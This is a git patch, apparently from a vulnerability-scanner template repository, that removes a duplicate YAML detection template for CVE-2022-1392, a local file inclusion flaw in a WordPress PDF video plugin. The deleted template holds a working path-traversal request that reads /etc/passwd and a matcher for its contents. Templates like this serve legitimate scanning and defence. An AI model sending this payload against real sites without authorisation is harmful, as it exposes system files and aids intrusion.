From db12feeeade3439649e6bcc81df64832fcde0384 Mon Sep 17 00:00:00 2001 From: Akincibor Date: Sat, 6 Aug 2022 19:19:49 +0200 Subject: [PATCH] Update Wordpress templates: typo, cve-id, ref & remove dupe --- .../wordpress/video-synchro-pdf-lfi.yaml | 34 ------------------- 1 file changed, 34 deletions(-) delete mode 100644 vulnerabilities/wordpress/video-synchro-pdf-lfi.yaml diff --git a/vulnerabilities/wordpress/video-synchro-pdf-lfi.yaml b/vulnerabilities/wordpress/video-synchro-pdf-lfi.yaml deleted file mode 100644 index 1af0ff6c7e..0000000000 --- a/vulnerabilities/wordpress/video-synchro-pdf-lfi.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2022-1392 - -info: - name: WordPress Videos sync PDF 1.7.4 - Local File Inclusion - author: Splint3r7 - severity: high - description: WordPress Videos sync PDF 1.7.4 is vulnerable to local file inclusion. - reference: - - https://www.exploit-db.com/exploits/50844 - - https://wordpress.org/plugins/video-synchro-pdf/ - - https://wpscan.com/vulnerability/fe3da8c1-ae21-4b70-b3f5-a7d014aa3815 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 - cve-id: CVE-2022-1392 - tags: wordpress,wp-plugin,lfi,wp - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../etc/passwd%00' - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/29